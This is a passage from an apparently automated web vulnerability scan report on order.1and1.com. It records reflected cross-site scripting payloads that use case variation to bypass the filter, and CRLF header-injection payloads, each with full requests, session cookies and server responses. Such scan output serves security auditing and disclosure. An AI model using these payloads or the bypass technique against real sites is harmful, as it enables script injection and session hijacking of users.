Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:35:11 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=EYVY9QEE3YGBgWm1jajBoYi8hK2RXUSlAM0QsMC0tLCosKicnKikjJiodHx4dGj8tcGVndS0vKlozXWwyJSYiISYiICMhGyMxMDlxcjgtNGRtMyYnIyInJCEkHyIjHDQ=; Expires=Fri, 07-Apr-2079 21:49:18 GMT; Path=/
ETag: e83c3ad0fe1642c7f919fde422e24b61
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 25676


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
631C4D3D45323.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="Sharepoint";UNOUNO.params.lastpage="Sharepoint2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

1.25. http://order.1and1.com/xml/order/VirtualServerL [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/VirtualServerL

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/VirtualServerL is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/VirtualServerL. The payload dddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448 was submitted in the REST URL parameter 3. This input was returned as dddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448 in a subsequent request for the URL /xml/order/VirtualServerL.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/VirtualServerLdddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Request 2

GET /xml/order/VirtualServerL;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&ordernow=true HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/VirtualServer;jsessionid=74A6996F72C07E2EFF8309BE58E891BE.TCpfix141a?__frame=_top&__lf=Order-Tariff&linkOrigin=CloudDynamicServer&linkId=hd.tab.vps
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: backpage=CloudDynamicServer; ucuo=20110320185042-000.TCpfix141a; lastpage=VirtualServer; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=6185bdfc6163d400; UT=hdWo6PT40XV1dV2pgZy1lXyweKGFUTj1UR0EpLSoqKScpJyQkJyYgIycaHBsaLlNBbWJkciosJ1cwWmkvIiMfHiMfHSA1LzcuLTZubzUqMWFqMCMkIB8kIR8fHjMxMzY=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:31:AAABLtRnmq4LJJFFFit1Kk3sM2vCTUk2:1300643682990; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:55:14 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=1bmMzNjctVlZWUGNZYCZebzwuOHFkXjZNQDoiJiMjIiAiIB0dIB8wMzcqLCsqJ0w6ZltdayMlIFApU2IoGzMvLjMvLTAuKDAnJi9naC4jKlpjKRwdMC80MS8vLiwqLC8=; Expires=Fri, 07-Apr-2079 21:09:21 GMT; Path=/
ETag: 4e920a97deb964d5714c04e7a127f5e2
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 49849


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
891BE.TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="VirtualServerL";UNOUNO.params.lastpage="VirtualServerLdddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448";UNOUNO.params.articles="1|tariff-vps-l"};
   //-->
...[SNIP]...

1.26. http://order.1and1.com/xml/order/popupDomainPrices [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/popupDomainPrices

Issue detail

The value of REST URL parameter 3 submitted to the URL /xml/order/popupDomainPrices is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/popupDomainPrices. The payload 753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f was submitted in the REST URL parameter 3. This input was returned as 753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f in a subsequent request for the URL /xml/order/popupDomainPrices.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request 1

GET /xml/order/popupDomainPrices753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Request 2

GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response 2

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:48:45 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=VZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 22:02:52 GMT; Path=/
ETag: f4b8ec0d36405e52072e7ef2a900c637
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 20365


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
TCpfix141a";UNOUNO.params.sessionStatus="old";UNOUNO.params.variant="AC:default";UNOUNO.params.project="oneandone_en_us";UNOUNO.params.page="popupDomainPrices";UNOUNO.params.lastpage="popupDomainPrices753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f";UNOUNO.params.articles="1|tariff-beginner-package"};
   //-->
...[SNIP]...

2. HTTP header injection  previous  next
There are 12 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


2.1. http://order.1and1.com/xml/order/Jumpto [jsessionid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the jsessionid request parameter is copied into the Location response header. The payload ed455%0d%0a503217b4f8d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_toped455%0d%0a503217b4f8d&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_toped455
503217b4f8d

Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=5al8vMjMpUlJSTF9sczlxazgqNG1gWjJJPDYeIh8fHhweHDAwMzIsLzMmKCcmI0g2YldZZx8hHEwlZnU7Li8rKi8rKSwqJCwjIitjZCofJlZ2PC8wLCswLSotKCssJSY=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.2. http://order.1and1.com/xml/order/Jumpto [linkId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the linkId request parameter is copied into the Location response header. The payload c29e1%0d%0a97b1abda1ab was submitted in the linkId parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=c29e1%0d%0a97b1abda1ab&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:57 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=c29e1
97b1abda1ab
&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=2bWIyNTYsVVVVT2JYXyV0bjstN3BjXTVMPzkhJSIiIR8hHxwcHzUvMjYpKyopJks5ZVpcaiIkH08oUmEnMTIuLTIuLC8tJy8mJS5mZy0iKVliKBszLy4zMC0wKy4vKCk=; Expires=Fri, 07-Apr-2079 21:37:04 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.3. http://order.1and1.com/xml/order/Jumpto [linkOrigin parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the linkOrigin request parameter is copied into the Location response header. The payload a5802%0d%0a86591ee57c3 was submitted in the linkOrigin parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=a5802%0d%0a86591ee57c3&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:58 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=a5802
86591ee57c3
&linkId=hd.log.eue&__frame=_top
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=Gdms7Pj81Xl5eWGthaC5mYC0fKWJVTydVSEIqLisrKigqKCUlKCchJCgbHRwbGFRCbmNlcystKFgxW2owIyQgHyQgHiEfMDgvLjdvcDYrMmJrMSQlISAlIh8iHSA4MTI=; Expires=Fri, 07-Apr-2079 21:37:05 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.4. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b9161%0d%0a0390bad3044 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue&b9161%0d%0a0390bad3044=1 HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:58 GMT
Server: Apache
Location: http://redirect.1and1.com/?origin.site=PU.WH.US&origin.sid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&origin.page=Hosting&target.site=PU.WH.US&origin.ac=OM.US.USa02K18619H7072a&global.ucuoId=PUAC:default.WH.US-20110320183706-CC07C007652F99CC9FB631C4D3D45323.TCpfix141a&site=PU.WH.US&linkOrigin=Hosting&linkId=hd.log.eue&__frame=_top&b9161
0390bad3044
=1
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=vZ1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; Expires=Fri, 07-Apr-2079 21:37:05 GMT; Path=/
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8


2.5. http://order.1and1.com/xml/order/Jumpto [origin.page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://order.1and1.com
Path:   /xml/order/Jumpto

Issue detail

The value of the origin.page request parameter is copied into the Location response header. The payload 2e03b%0d%0ad348ca74978 was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.

Request

GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=2e03b%0d%0ad348ca74978&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 20 Mar 2011 18:22:58 GMT
Server: Apache
